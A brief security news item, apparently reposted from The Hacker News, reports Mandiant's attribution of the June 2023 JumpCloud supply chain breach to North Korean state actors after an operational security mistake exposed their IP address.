Security News > 2023 > July > North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder

North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder
2023-07-25 14:46

North Korean nation-state actors affiliated with the Reconnaissance General Bureau have been attributed to the JumpCloud hack following an operational security blunder that exposed their actual IP address.

The intrusion directed against JumpCloud took place on June 22, 2023, as part of a sophisticated spear-phishing campaign that leveraged the unauthorized access to breach fewer than five customers and less than 10 systems in what's called a software supply chain attack.

Mandiant's findings are based on an incident response initiated in the aftermath of a cyber attack against one of JumpCloud's impacted customers, an unnamed software solutions entity, the starting point being a malicious Ruby script executed via the JumpCloud agent on June 27, 2023.

A notable aspect of the incident is its targeting of four Apple systems running macOS Ventura versions 13.3 or 13.4.1, underscoring North Korean actors' continued investment in honing malware specially tailored for the platform in recent months.

"The vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today's world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware."

"The Kimsuky APT group is continuously launching spear-phishing attacks against Korean users," ASEC pointed out this month.


News URL

https://thehackernews.com/2023/07/north-korean-nation-state-actors.html